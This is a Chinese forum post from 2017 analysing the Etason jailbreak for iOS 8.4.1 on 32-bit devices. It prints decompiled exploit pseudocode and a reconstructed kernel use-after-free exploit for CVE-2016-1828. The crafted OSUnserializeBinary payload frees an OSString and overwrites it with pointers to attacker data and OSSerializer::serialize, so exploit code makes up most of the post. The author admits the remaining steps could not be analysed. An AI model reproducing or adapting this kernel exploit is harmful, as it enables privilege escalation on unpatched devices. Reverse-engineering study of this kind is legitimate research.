-
-
[分享]iOS 8.4.1 32-bit uaf 漏洞源碼分析
-
发表于: 2017-9-19 20:56
-
if (((r0 ^ 0xffffffff) & 0x1) != 0x0) {
r0 = __assert_rtn("runExploit", "/Users/tihmstar/dev/Etason JB/Etason JB/exploit.m", 0x1c9, "pthread_create(&insert_payload_thread, NULL, &insert_payload, args) == 0");
}
else {
while (arg_114 == 0x12345678) {
}
_logToFile("payload ptr: %p\n", arg_114, 0xdb29, r3, STK-1);
r0 = sleep(0x1);
arg_120 = *(int8_t *)0x15030;
arg_121 = *(int8_t *)0x15031;
arg_122 = *(int8_t *)0x15032;
arg_123 = *(int8_t *)0x15033;
arg_110 = 0x4;
arg_5C = r0;
*0x4 = 0x81000010;
arg_110 = 0x4;
if (_is_841_system() != 0x0) {
*(&arg_120 + arg_110) = 0x8000004;
arg_110 = 0x8000008;
*(&arg_120 + arg_110) = 0x327973;
arg_110 = 0x327977;
*(&arg_120 + arg_110) = 0x9000004;
arg_110 = 0x9000008;
*(&arg_120 + arg_110) = 0x327973;
arg_110 = 0x327977;
*(&arg_120 + arg_110) = 0xc000001;
arg_110 = 0xc000005;
*(&arg_120 + arg_110) = 0xb000001;
arg_110 = 0xb000005;
*(&arg_120 + arg_110) = 0xc000001;
arg_110 = 0xc000005;
}
else {
*(&arg_120 + arg_110) = 0x9000004;
arg_110 = 0x9000008;
*(&arg_120 + arg_110) = 0x327973;
arg_110 = 0x327977;
}
*(&arg_120 + arg_110) = 0xa000014;
arg_110 = 0xa000018;
*(&arg_120 + arg_110) = 0x8 + arg_114 + 0xffffffb4;
arg_110 = arg_110 + 0x4;
*(&arg_120 + arg_110) = 0x41414141;
arg_110 = 0x41414145;
*(&arg_120 + arg_110) = arg_114 + 0xffffffb4;
arg_110 = arg_110 + 0x4;
r2 = arg_110;
*(&arg_120 + r2) = 0x14;
arg_110 = 0x18;
arg_58 = arg_11C;
*(arg_110 + &arg_120) = 0x1 + _find_OSSerializer_serialize() + arg_58;
arg_110 = arg_110 + 0x4;
r0 = _is_841_system();
lr = &arg_120;
r1 = 0x2;
COND = r0 == 0x0;
r0 = 0x0;
asm{ };
if (!COND) {
r0 = 0x1;
}
asm{ };
if ((r0 & 0x1) == 0x0) {
r1 = 0x1;
}
感謝 Tihmstar 大神 雖然你不提供原始碼 但我仍然可以把它變成原始碼 
PS 漏洞寫法應該為
// CVE-2016-1828
memcpy(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature));
bufpos += sizeof(kOSSerializeBinarySignature);
WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10);
WRITE_IN(data, kOSSerializeSymbol | 4);
WRITE_IN(data, 0x00327973); // "sy2"
/* our key is a OSString object that will be freed */
WRITE_IN(data, kOSSerializeString | 4);
WRITE_IN(data, 0x00327973); // irrelevant
/* now this will free the string above */
WRITE_IN(data, kOSSerializeObject | 1); // ref to "sy2"
WRITE_IN(data, kOSSerializeBoolean | 1); // lightweight value
/* and this is the key for the value below */
WRITE_IN(data, kOSSerializeObject | 1); // ref to "sy2" again
WRITE_IN(data, kOSSerializeData | 0x14);
WRITE_IN(data, payload_ptr+PAYLOAD_TO_PEXPLOIT+PEXPLOIT_TO_UAF_PAYLOAD); // [00] address of uaf_payload_buffer
WRITE_IN(data, 0x41414141); // [04] dummy
WRITE_IN(data, payload_ptr+PAYLOAD_TO_PEXPLOIT); // [08] address of uaf_payload_buffer - 8
WRITE_IN(data, 0x00000014); // [0C] static value of 20
WRITE_IN(data, kernel_base+find_OSSerializer_serialize()+1); // [10] address of OSSerializer::serialize (+1)
/* now create a reference to object 1 which is the OSString object that was just freed */
WRITE_IN(data, kOSSerializeObject | kOSSerializeEndCollecton | 1 或 2);
後面還有內容 分析不出來
但是目前越獄也沒用 Cydia Bug 一堆 更新後 APP 消失 越獄了根本不能用
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
|
|
|---|---|
|
|
|
|
|
|
|
|
|
